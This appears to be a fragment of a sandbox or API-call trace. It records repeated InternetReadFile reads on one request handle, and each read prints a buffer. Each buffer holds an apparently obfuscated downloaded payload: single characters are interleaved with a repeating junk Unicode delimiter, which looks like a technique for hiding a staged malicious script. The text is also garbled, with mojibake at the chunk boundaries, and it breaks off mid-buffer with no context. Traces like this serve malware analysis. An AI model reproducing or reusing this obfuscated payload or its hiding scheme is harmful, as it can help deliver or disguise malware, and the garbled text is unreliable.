⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ6мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎â¡
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ³á³šË•ÒŽDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: #мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎNмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ3мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎwмᨲᇕáŠ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎTмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎXмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞâ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ­â™â˜±âŸŽâ¡³á³šË•ÒŽQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱